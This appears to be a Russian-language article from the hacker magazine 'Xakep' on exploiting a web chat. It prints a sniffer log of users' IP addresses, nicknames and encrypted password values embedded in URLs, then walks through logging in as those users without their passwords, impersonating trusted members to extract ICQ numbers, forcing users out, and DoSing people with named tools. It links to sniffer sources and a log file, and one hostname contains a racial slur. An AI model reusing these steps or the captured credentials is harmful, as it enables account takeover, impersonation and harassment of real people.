Электронная библиотека
Хакер
Дырки в безопасности чатов
Xakep, номер #009, стр. 009-025-2
[Tue 3:03pm] (id) 193.232.119.130 ns.misa.ac.ru 192.168.12.133 [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Dasha&passwd=27tQONxBHE612&custom1=on]
[Tue 3:03pm] (id) 195.210.130.46 d046.p1.col.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=YURIK&passwd=31ZUlukFqoI5c&custom1=on]
[Tue 3:03pm] (id) 195.91.140.77 ppp666.nigger.is.satan.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Satan&passwd=40xtEwTiIfRQI&custom1=on]
[Tue 3:03pm] (id) 195.2.78.163 p163.n78.dip.aha.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Patron25&passwd=13ttx6i7zWwkk&custom1=on]
[Tue 3:02pm] (id) 195.34.28.213 dialup-28213.dialup.ptt.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=_GUN_&passwd=13/hfDaaKZEeg&custom1=on]
Вот они все на ладони :).
Если надо, запингуем кого-нибудь со всех шеллов, а особых уродов заДоСим чем-нибудь типа kod.c или pimp.c.
Как хакеры втираются в доверие
Теперь можно зайти под любым пользователем, который находится в чате, не зная его пароль. Выбираем, например, доброго GUN'a, который уже 2 года в этом чате сидит и которому все доверяют. :) Копируем его строку и вставляем в браузер: http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=_GUN_&passwd=13/hfDaaKZEeg&custom1=on.
Вуаля! Мы зашли под ним в чат, и теперь, сославшись на потерю памяти, можно выведать у всех пользователей ICQ номера, дать чего надо и наслаждаться жизнью. :)
Не забудь, что после каждого изменения твоего файла с установками его нужно сохранять и нажимать кнопку применить.
Исходник снифера можно взять по адресу http://www.hackzone.ru/files/sniff.txt и изменить, чтобы не показывалась картинка, а то особо мудрые совы могут что-то заподозрить.
Очень много людей знают про хакзоновский сниффер, так что можно воспользоваться нашим: http://phorce.virtualave.net/cgi-bin/sniffer.cgi, лог-файл: http://phorce.virtualave.net/cgi-bin/fuck.log.
Как говорить от других имен
Узнав шифрованный пароль того кого нужно с помощью сниффера, сохраняем то окно, где нужно писать текст, и вставляем вместо своего ника чужой (и пароль, конечно), и пишем чего душе угодно!
Как выкидывать из чата
Опять же, получив шифрованный пароль в документе с настройками, сохраненном на нашем диске, в самом низу вставляем вместо своего ника и пароля - чужие. Сохраняем, открываем, жмем выход, затем видим сообщение, что Вася Пупкин покинул чат. :)
Как защититься от сниффера
Это очень просто. Залезаем в установки броузера и вырубаем показ картинок.